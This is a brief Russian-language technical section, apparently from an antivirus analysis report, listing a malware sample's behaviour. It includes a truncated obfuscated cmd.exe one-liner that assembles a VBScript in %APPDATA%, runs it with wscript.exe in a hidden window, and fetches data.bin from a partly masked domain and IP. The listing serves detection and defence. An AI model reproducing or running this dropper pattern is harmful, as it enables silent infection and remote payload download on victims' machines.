Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "C5=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm CuZRv8k" "fUNctiON A2uvJ(YR)" "WzvF=92" "A2uvJ=chR(YR)" "MuvR=72" "End fUncTIOn" "sUB CG()" "Jc=11" "Sn44=94157511" "XN=81" "FoR KqE=1 ...
- %APPDATA%\8731.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\8731.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "C5=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm CuZRv8k" "fUNctiON A2uvJ(YR)" "WzvF=92" "A2uvJ=chR(YR)" "MuvR=72" "End fUncTIOn" "sUB CG()" "Jc=11" "Sn44=94157511" "XN=81" "FoR KqE=1 ...' (со скрытым окном)